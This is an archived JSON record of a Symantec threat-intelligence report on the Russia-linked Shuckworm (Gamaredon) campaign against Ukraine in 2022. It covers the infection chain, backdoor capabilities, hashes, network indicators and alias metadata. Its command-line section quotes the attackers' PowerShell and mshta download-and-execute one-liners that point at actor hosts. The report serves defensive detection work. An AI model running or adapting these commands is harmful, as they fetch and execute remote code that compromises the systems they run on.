{
	"id": "edb70eb7-a30b-4f52-8694-2304ff597e88",
	"created_at": "2026-04-06T00:14:23.978389Z",
	"updated_at": "2026-04-10T13:13:10.379308Z",
	"deleted_at": null,
	"sha1_hash": "3af099ac62509fc210625d28a1e733d38f2b4ad0",
	"title": "Shuckworm: Russia-Linked Group Maintains Ukraine Focus",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 74223,
	"plain_text": "Shuckworm: Russia-Linked Group Maintains Ukraine Focus\r\nBy About the Author\r\nArchived: 2026-04-05 18:04:45 UTC\r\nUPDATE, 17.40 BST, August 15, 2022: Update for clarity re use of VCD, ASC, and H264 file extensions in file names.\r\nUPDATE, 17.50 BST, August 17, 2022: Additional IOCs added\r\nRecent Shuckworm activity observed by Symantec, a division of Broadcom Software, and aimed at Ukraine appears to be\r\ndelivering information-stealing malware to targeted networks. This activity was ongoing as recently as August 8, 2022 and\r\nmuch of the activity observed in this campaign is consistent with activity that was highlighted by CERT-UA on July 26.\r\nThe activity observed by Symantec began on July 15, and we have additional indicators of compromise (IOCs) and technical\r\ndetails to share about this campaign.\r\nShuckworm (aka Gamaredon, Armageddon) is a Russia-linked group that has almost exclusively focused its operations on\r\nUkraine since it first appeared in 2014. It is generally considered to be a state-sponsored espionage operation.\r\nInfection Vector\r\nThe first suspicious activity Symantec saw on victim systems was a self-extracting 7-Zip file, which was downloaded via the\r\nsystem’s default browser. Subsequently, mshta.exe downloaded an XML file, which was likely masquerading as an HTML\r\napplication (HTA) file.\r\nThese files were downloaded from the following domain: a0698649[.]xsph[.]ru. It has been publicly documented since May\r\n2022 that subdomains of xsph[.]ru are associated with Shuckworm activity, and this domain was once again mentioned in\r\nCERT-UA’s July 26 publication about Shuckworm activity.\r\nThis domain was also associated with an email that spoofed being from the Security Service of Ukraine and had\r\n“Intelligence Bulletin” in the subject line, according to CERT-UA. This being the case, it is most likely the 7-Zip file seen on\r\nvictim networks in the campaign observed by Symantec was delivered to victims via email.\r\nAttack Chain\r\nThe downloading of the XML file onto victim networks was followed by the execution of a PowerShell stealer. We saw\r\nthree versions of the same PowerShell stealer appear on the one system. It’s possible the attackers may have deployed\r\nmultiple versions of the stealer, which were all very similar, as an attempt to evade detection.\r\nTwo VBS downloaders that had the words “juice” and “justice” in their file names were also observed on victim machines.\r\nAnalysis found that these were Backdoor.Pterodo, a well-known Shuckworm tool that Symantec blogged about earlier this\r\nyear. These scripts are capable of calling PowerShell, uploading screenshots, and also executing code downloaded from a\r\ncommand-and-control (C\u0026C) server.   \r\nVarious suspicious files containing “ntuser” in the file names were also seen on victim machines. We associate these\r\n“ntuser” files with Shuckworm activity, and many variants of them are malicious, with most detected as the Giddome\r\nbackdoor, another well-known Shuckworm tool.\r\nWe saw various parent processes with file names that had VCD, H264 and ASC extensions. A file named\r\nntuser.dat.tmcontainer.vcd was the parent process for a Giddome backdoor variant named ntuser.dat.tm.descendant.exe that\r\nwas seen on victim machines. A suspicious file named ntuser.dat.tmcontainer.h264 had a child process named\r\nntuser.dat.tm.declare.exe, another malicious Giddome backdoor binary. Elsewhere, a file named ntuser.dat.tmcontainer.asc\r\nhad a child process named ntuser.dat.tm.decay.exe.\r\nVCD files are disc images of a CD or DVD and are recognized by Windows as an actual disc, similar to ISO files, which we\r\ncommonly see malicious actors use to deliver payloads. An ASC file is an encrypted file that may contain text or binary\r\ninformation encoded as text, while an H264 file is a video file. However, filenames with the ntuser.dat.tmcontainer prefix\r\nare files that represent the registry.\r\nIt’s not clear if these are the actual file types, or if the attackers are using these file names as a means of sowing confusion.\r\nThe backdoor dropped on victim systems had the file name 4896.exe. This backdoor had multiple capabilities, including:\r\nRecord audio using the microphone and upload the recorded files to a remote location\r\nTake screenshots and upload them\r\nLog and upload keystrokes\r\nDownload and execute .exe files or download and load DLL files\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/russia-ukraine-shuckworm\r\nPage 1 of 5\n\nThe legitimate remote desktop protocol (RDP) tools Ammyy Admin and AnyDesk were both also leveraged by the attackers\r\nfor remote access. Legitimate RDP tools like these and others are frequently leveraged for remote access by attackers in both\r\nransomware and nation-state-backed cyber attacks.\r\nShuckworm Keeps Focus on Ukraine \r\nThis campaign, combined with previous public reporting on Shuckworm, shows some patterns in the operations of the group\r\nat the moment, including its reuse of patterns, e.g. paths (such as csidl_profile\\music), using files that contain \"ntuser.dat\" in\r\nthe file name, using various artifacts that contain, for example, \"judgement\" in the file name, and also leveraging EXE files\r\nwhose file names contain English words that begin with \"D\", “dat”, “decay”, “deer”, “declare”, etc.\r\nAs the Russian invasion of Ukraine approaches the six-month mark, Shuckworm’s long-time focus on the country appears to\r\nbe continuing unabated. That this recent activity continues even after CERT-UA documented it shows that fear of exposure\r\ndoes not deter the group from its activities. While Shuckworm is not necessarily the most tactically sophisticated espionage\r\ngroup, it compensates for this in its focus and persistence in relentlessly targeting Ukrainian organizations.\r\nProtection/Mitigation\r\nFor the latest protection updates, please visit the Symantec Protection Bulletin.\r\nIndicators of Compromise\r\nIf an IOC is malicious and the file available to us, Symantec Endpoint products will detect and block that file.\r\nSHA256 files\r\nabb6aab63b29610dbc0a6d634b6777ff0a2a2b61c5f60bd09b0c3aa3919fa00d\r\n63490fc0828f9683f5dd5799452d684dcc32db28d683943b2bad5b56eee6f03e\r\nb66cc523b88505cc2cc0568e97c9a80b1ceae448c8ac7d7b0d9c0f36378d8c2f\r\n26fcfbbfe4deeae3797bc7999c641f7a93e5a7eb378cf998069d88060801c47d\r\n1f8a4cf57052e66d4de953fcda3aca627308f93b6560934959d745ca6dda66d9\r\n1aceb88288dd40535fdddcbdc1aa174109fe897122d693280d6ccec827f4df0b\r\nea4ba2c43bc3d18e5d01168ff4f864cbf727e3cb8b9cce5c3f75a27c91d63d84\r\n9da410a62fb552a593b6da8ee89aa451efb6efcd1f3a35fab24e3c04fec84030\r\n420fccd78efe1e4739c3a694afada023e1ce425c29a0affa91bf02c16912d143\r\ne5f34a99d6799c4ff3a4b06e4f42ff136c1a0f59dd4629f3e4da3a7a93e7c88e\r\nd358e4b6afd14fd7b058e0deaeca0bf3537edc264ef7674c1c49db35b82b2d24\r\nf151d2b404315afe4951cbd870866e8fbb11d05d3752ad096bf00d68072d2262\r\nf1c65464f2a86cb6ad6c6792c7553d4162849b5a229fcc396c737edffdb1ee80\r\nc40aaaecb9331f1ddac9fe9b6d3455ecfd7b21b53159453f7fa3a82e3d5f9ecc\r\n2c7943730f3dfb89f534fcb137a4f6e53a7a697309e6cc247f0f9800f1460731\r\nb783b82e846bd8a623ca32982585cf8b79ce7cbf9988a041f7b2ac7fe5f8a7fe\r\n66d2b38589d08bbbe56b34b88bcefc702cdc6593c71e5ee446dbbb115336b876\r\nac862717600c531846895f8884841d23e52c8332e708ca11c17a5c162ce43432\r\nb9c8ec91559a62baf87305e0ee387bb777da7830a6d9fc72c630e873858ec465\r\nd7d4077af0aff349821f0e964f42db5ab09eb8b2f427f266378aaa1d28af6c57\r\n3f3667294731e3bdbf13d96d32a98342e225601f20157f774917d9147ce692a4\r\n597c517c81a53f7a32a67eb2b15e51a95b6bfdd4a33b11850b08eccf6e29d098\r\n184b5ff96d90a46ad33ba82faa2bb298282e7c35afc0ab96f884f668ad098e61\r\n20b1f6fec7a0f09c64e7e09de7952b7532f8c9cd4b45177d2125d84c6a40ec73\r\n8cbae307b9efdb760cc97468ee7a363d5204559ab21e7982d63867cc13c6b098\r\n92953773c3b405f341df8e68bd8a23cbc9b8fd6c708082aab91632d6cb84bac2\r\n8a5933f7248d1cf2dba19980efaf4f5d5b139563a22cec81df276661c0146450\r\n22ddb97a23a9010b445b08a807b22a997174f528e87604be0bba4e0ccfa18050\r\nb26e8d55828dc8143b68ef6140eab7e5e7e59e6b9e104e032b28f5058a127d51\r\nefd099e4900b692a362cf29a12cd2a100a99b1dd29cfaac4b456808795c07b0f\r\n3fc80fcbf9e813d00af3f54714f79d7accd3888689ac6c5d02a750d804f4e5c3\r\n30761d0a9b08c69cfdd135c69a537aef0df516b097cd9d6a0d9528bc907f4ddd\r\naa97a858124fb47ea2572a197bd762da9c19bac91bdd4c17469c2e48480e8088\r\n3790ddd924b08942f3ecb6da5a32df090274b90829e651f984f287c00db04592\r\n02963acfa5622901de83cb75fad5bef35902d0ae42310d47f7433379dd3543e8\r\n6461d0693801d8d523df9d2d0cd5a652d72c10acec8fab7344bb141c459543e1\r\n8b1e48dfab33ed67f8ccd788904f2cd4be521ff152a477cec4baba52b56aec15\r\n5f05ba566a66531b988c5a1dceee0b4a7bc2dc34ad2b68d984486e02891a4f6c\r\n3dc83f72a830c54980738467fb36e7b6b5da80e0d9657bd440dcad46ae9f96a2\r\nf895adfe7882bac956f31ec14fb52ea118138257d4a95fb9e1bb6f4e846d07b8\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/russia-ukraine-shuckworm\r\nPage 2 of 5\n\n71fdd0edf4699051f5506f34f2663938faeca9400dae1c034ddb6b710d41c7d7\r\n4b9023dbaadd588dad670c49e5a202ae695e12689618f926249d49a935c07315\r\nef7eb27e19d11894b52148fbe8987b5726ef4390a56aa47a9a4bbe4b17dd0876\r\nHost IOCs\r\nntuser.dat.tm.declare.exe / 2d0792d3f9d5a921a2d5b476feb88a345869d2f0d95f7342cc10ac1c838896cb\r\njury.mp3 / 4a2b252eccab7da63aadb7a5539cc4ed8385d7bf258c325dea60ed0edc3e0e25\r\njoy.dat / b62bf1a504a474e259d78fc3349eed94982d6bf6af6012e23a1ec14b3d156dc9\r\ndo594e.tmp / 09709be5f7cbb076166d004265a378504f05832ba461f59181b96b374c31a4b3\r\ncronos.exe / c3b7a1a739e3641147f4c10c5acfbc5816c12892b0edbe8038928f236f44ec84\r\ndelve.prj / fd61dee37bafb3392fa4450d2afef18cf6b4b3fc5c87476de128c999e58cae59\r\n3893.bmp.vbs / c0a317f60910eed08bbfc7b3ac6e6de1b2029bf4922d0b0d7d3759313a24b16c\r\nNetwork IOCs\r\ndestroy.asierdo[.]ru\r\nhxxp://destroy.asierdo[.]ru/\r\n45.63.94[.]49\r\n165.22.215[.]30\r\n149.28.99[.]187\r\n45.63.79[.]134\r\n140.82.58[.]157\r\n139.180.172[.]67\r\n141.164.45[.].236\r\n95.179.167[.]182\r\n140.82.47[.]97\r\n159.223.235[.]224\r\n138.68.254[.]91\r\n217.163.30[.]126\r\n144.202.54[.]111\r\n159.89.129[.]22\r\n207.246.80[.]1\r\nhxxp://159.223.235[.]224/crab/crevice.elg\r\na0698649.xsph[.]ru\r\nhxxp://a0698649.xsph[.]ru/preparations/band.xml\r\n157.245.99[.]132\r\nhxxp://157.245.99[.]132/get.php\r\n194.180.174[.]73\r\nhxxp://194.180.174[.]73/1.txt\r\n*.pasamart[.]ru\r\n155.138.252[.]221\r\nhxxp://155.138.252[.]221/get.php\r\n68.183.9[.]9\r\nhxxp://68.183.9[.]9/get.php\r\nmotoristo.ru\r\n178.62.108[.]75\r\nhxxp://motoristo[.]ru/get.php\r\nheato[.]ru\r\n140.82.54[.]136\r\nhxxp://heato[.]ru/index.php\r\nleonardis[.]ru\r\n104.238[.]187.145\r\n141.8.192[.]82\r\n139.59.65[.]168 \r\nhxxp://139.59.65[.]168/journal.au\r\n45.63.100[.]72\r\nhxxp://45.63.100[.]72/get.php?fr=3126424\u0026se=3089412\u0026dl=hxxps://meta[.]ua/uk/news/politics/52320-ukrayina-rozshirila-oboronnu-spivpratsyu-z-danieyu/\u0026rm=hxxps://meta[.]ua/uk/\u0026kf=false\u0026ts=5875621\u0026dw=2240\u0026dh=1951\u0026t=2053953\u0026s=stable\u0026eec=3242252\u0026po=6485826\u0026ju=8204688\u0026kio\r\n199.247.25[.]79\r\nhxxp://199.247.25[.]79/get.php\r\nCommand lines\r\nCSIDL_PROFILE\\appdata\\local\\temp\\1645694127.exe\r\nCSIDL_PROFILE\\downloads\\anydesk (2).exe\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/russia-ukraine-shuckworm\r\nPage 3 of 5\n\nCSIDL_PROFILE\\ntuser.dat.tm.decay.exe\r\nCSIDL_SYSTEM\\cmd.exe /c copy /y CSIDL_PROFILE\\appdata\\local\\temp\\17634.bmp\r\nCSIDL_PROFILE\\appdata\\local\\temp\\17634.bmp.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c copy /y CSIDL_PROFILE\\appdata\\local\\temp\\5491.bmp\r\nCSIDL_PROFILE\\appdata\\local\\temp\\5491.bmp.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c del /f /q CSIDL_PROFILE\\29630.ico.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c echo .\u003e CSIDL_PROFILE\\appdata\\local\\temp\\17634.bmp\r\nCSIDL_SYSTEM\\cmd.exe /c echo .\u003e CSIDL_PROFILE\\appdata\\local\\temp\\17634.bmp.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c echo .\u003e CSIDL_PROFILE\\appdata\\local\\temp\\5491.bmp\r\nCSIDL_SYSTEM\\cmd.exe /c echo .\u003e CSIDL_PROFILE\\appdata\\local\\temp\\5491.bmp.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c echo '\u003e\u003eC:\\Users\\User\\29630.ico\r\nCSIDL_SYSTEM\\cmd.exe /c echo '\u003eC:\\Users\\User\\29630.ico.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c echo '17634.bmp\u003e\u003e CSIDL_PROFILE\\appdata\\local\\temp\\17634.bmp\r\nCSIDL_SYSTEM\\cmd.exe /c echo '5491.bmp\u003e\u003e CSIDL_PROFILE\\appdata\\local\\temp\\5491.bmp\r\nCSIDL_SYSTEM\\cmd.exe /c rename CSIDL_PROFILE\\29630.ico 29630.ico.txt\r\nCSIDL_SYSTEM\\cmd.exe /c rename CSIDL_PROFILE\\29630.ico.txt 29630.ico.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c start /b CSIDL_PROFILE\\29630.ico.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c start /b CSIDL_PROFILE\\appdata\\local\\temp\\17634.bmp.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c start /b CSIDL_PROFILE\\appdata\\local\\temp\\5491.bmp.vbs\r\nCSIDL_SYSTEM\\mshta.exe hxxp://a0698649.xsph[.]ru/preparations/band.xml /f\r\nCSIDL_SYSTEM\\windowspowershell\\v1.0\\powershell.exe -nol -nop echo (INVOKE-EXPRESSION(new-object\r\nnet.webclient).downloadstring('hxxp://157.245.99[.]132/get.php')) | powershell -\r\nCSIDL_SYSTEM\\windowspowershell\\v1.0\\powershell.exe -windowstyle hidden -nologo Invoke-Expression $env:Include\r\nCSIDL_SYSTEM\\windowspowershell\\v1.0\\powershell.exe $aaa = (New-Object\r\nsystem.Net.WebClient).downloadString('hxxp://194.180.174[.]73/1.txt'); iex $aaa;\r\nCSIDL_SYSTEM\\windowspowershell\\v1.0\\powershell.exe $ip = [System.Net.DNS]::GetHostAddresses([string]$(Get-Random)+'.pasamart.ru');Start-Sleep -s 10;$IE1 = New-Object -COMObject InternetExplorer.Application -Property\r\n@{Navigate2=$([string]$ip+'/lnk.php'); Visible = $False};while ($IE1.ReadyState -ne 4) {Start-Sleep 2};$Doc =\r\n$IE1.document.GetType().InvokeMember('body', [System.Reflection.BindingFlags]::GetProperty, $Null, $IE1.document,\r\n$Null).InnerHtml;$IE1.quit();[io.file]::WriteAllText($($env:USERPROFILE+'\\index.txt'),$Doc); iex(iex $Doc)\r\nCSIDL_SYSTEM\\windowspowershell\\v1.0\\powershell.exe $tmp = $(New-Object\r\nnet.webclient).DownloadString('hxxp://155.138.252[.]221/get.php'); Invoke-Expression $tmp\r\nCSIDL_SYSTEM\\windowspowershell\\v1.0\\powershell.exe $tmp = $(New-Object\r\nnet.webclient).DownloadString('hxxp://68.183.9[.]9/get.php'); Invoke-Expression $tmp\r\nCSIDL_SYSTEM\\wscript.exe CSIDL_PROFILE\\29630.ico.vbs\r\nCSIDL_SYSTEM\\wscript.exe CSIDL_PROFILE\\appdata\\local\\temp\\17634.bmp.vbs\r\nCSIDL_SYSTEM\\wscript.exe CSIDL_PROFILE\\appdata\\local\\temp\\5491.bmp.vbs\r\nCSIDL_SYSTEM\\wscript.exe CSIDL_PROFILE\\appdata\\local\\temp\\ho2btvivw2m.vbs\r\nCSIDL_SYSTEM\\wscript.exe CSIDL_PROFILE\\ntuser.dat.tmcontainer.asc //e:vbscript /deserve /decidedly /dene //b\r\nCSIDL_SYSTEMX86\\windowspowershell\\v1.0\\powershell.exe -Version 5.1 -s -NoLogo -NoProfile\r\nCSIDL_SYSTEM\\cmd.exe /c CSIDL_PROFILE\\appdata\\local\\temp\\7zsfx000.cmd \r\nCSIDL_SYSTEM\\cmd.exe /c start /min  powershell -w hidden -c (iex echo (iex (new-object\r\nnet.webclient).downloadstring('hxxp://motoristo[.]ru/get.php'))|powershell - )\r\nCSIDL_WINDOWS\\explorer.exe\r\npowershell -w hidden -c (iex echo (iex (new-object\r\nnet.webclient).downloadstring('hxxp://motoristo[.]ru/get.php'))|powershell - )\r\npowershell -w hiddeN -c (iex echo (iex (new-object\r\nnet.webclient).downloadstring('hxxp://sacramentos[.]ru/get.php'))|powershell - )\r\nwscript.exe CSIDL_PROFILE\\ntuser.dat.tmcontainer.asc //e:vbscript /deserve /decidedly /dene //b\r\nwscript.exe CSIDL_PROFILE\\documents\\jury.mp3 jenny //e:VBScript //b joke\r\nCSIDL_PROFILE\\cronos.exe\r\nCSIDL_SYSTEM\\cmd.exe /c copy /y CSIDL_PROFILE\\appdata\\local\\temp\\3893.bmp\r\nCSIDL_PROFILE\\appdata\\local\\temp\\3893.bmp.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c echo .\u003e CSIDL_PROFILE\\appdata\\local\\temp\\3893.bmp\r\nCSIDL_SYSTEM\\cmd.exe /c echo .\u003e CSIDL_PROFILE\\appdata\\local\\temp\\3893.bmp.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c echo '3893.bmp\u003e\u003e CSIDL_PROFILE\\appdata\\local\\temp\\3893.bmp\r\nCSIDL_SYSTEM\\cmd.exe /c start /b CSIDL_PROFILE\\appdata\\local\\temp\\3893.bmp.vbs\r\nCSIDL_SYSTEM\\windowspowershell\\v1.0\\powershell.exe -nol -nop $nwc = new-object\r\nnet.webclient;$nwc.headers['Accept']='image/avif,image/webp,*/*';$nwc.headers['Accept-Encoding']='*';$nwc.headers['Accept-Language']='en-US,en;q=0.5';$nwc.headers['Alt-Used']='www.facebook.com';$nwc.headers['Referer']='https://meta.ua/';$nwc.headers['Sec-Fetch-Dest']='document';$nwc.headers['Sec-Fetch-Mode']='no-cors';$nwc.headers['Sec-Fetch-Site']='cross-site';$nwc.headers['TE']='trailers';$nwc.headers['User-Agent']='Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:101.0)\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/russia-ukraine-shuckworm\r\nPage 4 of 5\n\nGecko/20100101 Firefox/101.0';$code=\r\n([system.text.encoding]::utf8.getstring($nwc.DownloadData('http://45.63.100.72/get.php?\r\nfr=3126424\u0026se=3089412\u0026dl=https://meta.ua/uk/news/politics/52320-ukrayina-rozshirila-oboronnu-spivpratsyu-z-danieyu/\u0026rm=https://meta.ua/uk/\u0026kf=false\u0026ts=5875621\u0026dw=2240\u0026dh=1951\u0026t=2053953\u0026s=stable\u0026eec=3242252\u0026po=6485826\u0026ju=8204688\u0026kio=f\r\n$code|iex\r\nCSIDL_SYSTEM\\windowspowershell\\v1.0\\powershell.exe $tmp = $(New-Object\r\nnet.webclient).DownloadString('http://199.247.25.79/get.php'); Invoke-Expression $tmp\r\nCSIDL_SYSTEM\\wscript.exe CSIDL_PROFILE\\appdata\\local\\temp\\3893.bmp.vbs\r\nCSIDL_SYSTEM\\wscript.exe CSIDL_PROFILE\\delve.prj //e:vbscript /departments /dependant /despite //b\r\nCSIDL_SYSTEM\\cmd.exe /c CSIDL_PROFILE\\appdata\\local\\temp\\7zsfx000.cmd \r\nCSIDL_SYSTEM\\cmd.exe /c copy /y CSIDL_PROFILE\\appdata\\local\\temp\\10805.bmp\r\nCSIDL_PROFILE\\appdata\\local\\temp\\10805.bmp.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c copy /y CSIDL_PROFILE\\appdata\\local\\temp\\14612.bmp\r\nCSIDL_PROFILE\\appdata\\local\\temp\\14612.bmp.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c copy /y CSIDL_PROFILE\\appdata\\local\\temp\\19084.bmp\r\nCSIDL_PROFILE\\appdata\\local\\temp\\19084.bmp.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c copy /y CSIDL_PROFILE\\appdata\\local\\temp\\20342.bmp\r\nCSIDL_PROFILE\\appdata\\local\\temp\\20342.bmp.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c copy /y CSIDL_PROFILE\\appdata\\local\\temp\\26012.bmp\r\nCSIDL_PROFILE\\appdata\\local\\temp\\26012.bmp.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c copy /y CSIDL_PROFILE\\appdata\\local\\temp\\5275.bmp\r\nCSIDL_PROFILE\\appdata\\local\\temp\\5275.bmp.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c copy /y CSIDL_PROFILE\\appdata\\local\\temp\\5491.bmp\r\nCSIDL_PROFILE\\appdata\\local\\temp\\5491.bmp.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c del /f /q CSIDL_PROFILE\\30802.ico.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c del /f /q CSIDL_PROFILE\\8527.ico.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c echo .\u003e CSIDL_PROFILE\\appdata\\local\\temp\\10805.bmp.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c echo .\u003e CSIDL_PROFILE\\appdata\\local\\temp\\14612.bmp.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c echo .\u003e CSIDL_PROFILE\\appdata\\local\\temp\\19084.bmp.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c echo .\u003e CSIDL_PROFILE\\appdata\\local\\temp\\20342.bmp.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c echo .\u003e CSIDL_PROFILE\\appdata\\local\\temp\\26012.bmp.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c echo .\u003e CSIDL_PROFILE\\appdata\\local\\temp\\5275.bmp.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c echo .\u003e CSIDL_PROFILE\\appdata\\local\\temp\\5491.bmp.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c echo '\u003eC:\\Users\\User\\30802.ico.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c echo '\u003eC:\\Users\\User\\8527.ico.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c rename CSIDL_PROFILE\\30802.ico.txt 30802.ico.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c rename CSIDL_PROFILE\\8527.ico.txt 8527.ico.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c start /b CSIDL_PROFILE\\30802.ico.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c start /b CSIDL_PROFILE\\8527.ico.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c start /b CSIDL_PROFILE\\appdata\\local\\temp\\10805.bmp.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c start /b CSIDL_PROFILE\\appdata\\local\\temp\\14612.bmp.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c start /b CSIDL_PROFILE\\appdata\\local\\temp\\19084.bmp.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c start /b CSIDL_PROFILE\\appdata\\local\\temp\\20342.bmp.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c start /b CSIDL_PROFILE\\appdata\\local\\temp\\26012.bmp.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c start /b CSIDL_PROFILE\\appdata\\local\\temp\\5275.bmp.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c start /b CSIDL_PROFILE\\appdata\\local\\temp\\5491.bmp.vbs\r\nCSIDL_SYSTEM\\wscript.exe CSIDL_PROFILE\\30802.ico.vbs\r\nCSIDL_SYSTEM\\wscript.exe CSIDL_PROFILE\\8527.ico.vbs\r\nCSIDL_SYSTEM\\wscript.exe CSIDL_PROFILE\\appdata\\local\\temp\\10805.bmp.vbs\r\nCSIDL_SYSTEM\\wscript.exe CSIDL_PROFILE\\appdata\\local\\temp\\14612.bmp.vbs\r\nCSIDL_SYSTEM\\wscript.exe CSIDL_PROFILE\\appdata\\local\\temp\\19084.bmp.vbs\r\nCSIDL_SYSTEM\\wscript.exe CSIDL_PROFILE\\appdata\\local\\temp\\20342.bmp.vbs\r\nCSIDL_SYSTEM\\wscript.exe CSIDL_PROFILE\\appdata\\local\\temp\\26012.bmp.vbs\r\nCSIDL_SYSTEM\\wscript.exe CSIDL_PROFILE\\appdata\\local\\temp\\5275.bmp.vbs\r\nCSIDL_SYSTEM\\wscript.exe CSIDL_PROFILE\\appdata\\local\\temp\\5491.bmp.vbs\r\nSource: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/russia-ukraine-shuckworm\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/russia-ukraine-shuckworm\r\nPage 5 of 5",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/russia-ukraine-shuckworm"
	],
	"report_names": [
		"russia-ukraine-shuckworm"
	],
	"threat_actors": [
		{
			"id": "81bd7107-6b2d-45c9-9eea-1843d4b9b308",
			"created_at": "2022-10-25T15:50:23.320841Z",
			"updated_at": "2026-04-10T02:00:05.356444Z",
			"deleted_at": null,
			"main_name": "Gamaredon Group",
			"aliases": [
				"Gamaredon Group",
				"IRON TILDEN",
				"Primitive Bear",
				"ACTINIUM",
				"Armageddon",
				"Shuckworm",
				"DEV-0157",
				"Aqua Blizzard"
			],
			"source_name": "MITRE:Gamaredon Group",
			"tools": [
				"QuietSieve",
				"Pteranodon",
				"Remcos",
				"PowerPunch"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d5156b55-5d7d-4fb2-836f-861d2e868147",
			"created_at": "2023-01-06T13:46:38.557326Z",
			"updated_at": "2026-04-10T02:00:03.023048Z",
			"deleted_at": null,
			"main_name": "Gamaredon Group",
			"aliases": [
				"ACTINIUM",
				"DEV-0157",
				"Blue Otso",
				"G0047",
				"IRON TILDEN",
				"PRIMITIVE BEAR",
				"Shuckworm",
				"UAC-0010",
				"BlueAlpha",
				"Trident Ursa",
				"Winterflounder",
				"Aqua Blizzard",
				"Actinium"
			],
			"source_name": "MISPGALAXY:Gamaredon Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "61940e18-8f90-4ecc-bc06-416c54bc60f9",
			"created_at": "2022-10-25T16:07:23.659529Z",
			"updated_at": "2026-04-10T02:00:04.703976Z",
			"deleted_at": null,
			"main_name": "Gamaredon Group",
			"aliases": [
				"Actinium",
				"Aqua Blizzard",
				"Armageddon",
				"Blue Otso",
				"BlueAlpha",
				"Callisto",
				"DEV-0157",
				"G0047",
				"Iron Tilden",
				"Operation STEADY#URSA",
				"Primitive Bear",
				"SectorC08",
				"Shuckworm",
				"Trident Ursa",
				"UAC-0010",
				"UNC530",
				"Winterflounder"
			],
			"source_name": "ETDA:Gamaredon Group",
			"tools": [
				"Aversome infector",
				"BoneSpy",
				"DessertDown",
				"DilongTrash",
				"DinoTrain",
				"EvilGnome",
				"FRAUDROP",
				"Gamaredon",
				"GammaDrop",
				"GammaLoad",
				"GammaSteel",
				"Gussdoor",
				"ObfuBerry",
				"ObfuMerry",
				"PlainGnome",
				"PowerPunch",
				"Pteranodon",
				"Pterodo",
				"QuietSieve",
				"Remcos",
				"RemcosRAT",
				"Remote Manipulator System",
				"Remvio",
				"Resetter",
				"RuRAT",
				"SUBTLE-PAWS",
				"Socmer",
				"UltraVNC"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "236a8303-bf12-4787-b6d0-549b44271a19",
			"created_at": "2024-06-04T02:03:07.966137Z",
			"updated_at": "2026-04-10T02:00:03.706923Z",
			"deleted_at": null,
			"main_name": "IRON TILDEN",
			"aliases": [
				"ACTINIUM ",
				"Aqua Blizzard ",
				"Armageddon",
				"Blue Otso ",
				"BlueAlpha ",
				"Dancing Salome ",
				"Gamaredon",
				"Gamaredon Group",
				"Hive0051 ",
				"Primitive Bear ",
				"Shuckworm ",
				"Trident Ursa ",
				"UAC-0010 ",
				"UNC530 ",
				"WinterFlounder "
			],
			"source_name": "Secureworks:IRON TILDEN",
			"tools": [
				"Pterodo"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434463,
	"ts_updated_at": 1775826790,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3af099ac62509fc210625d28a1e733d38f2b4ad0.pdf",
		"text": "https://archive.orkl.eu/3af099ac62509fc210625d28a1e733d38f2b4ad0.txt",
		"img": "https://archive.orkl.eu/3af099ac62509fc210625d28a1e733d38f2b4ad0.jpg"
	}
}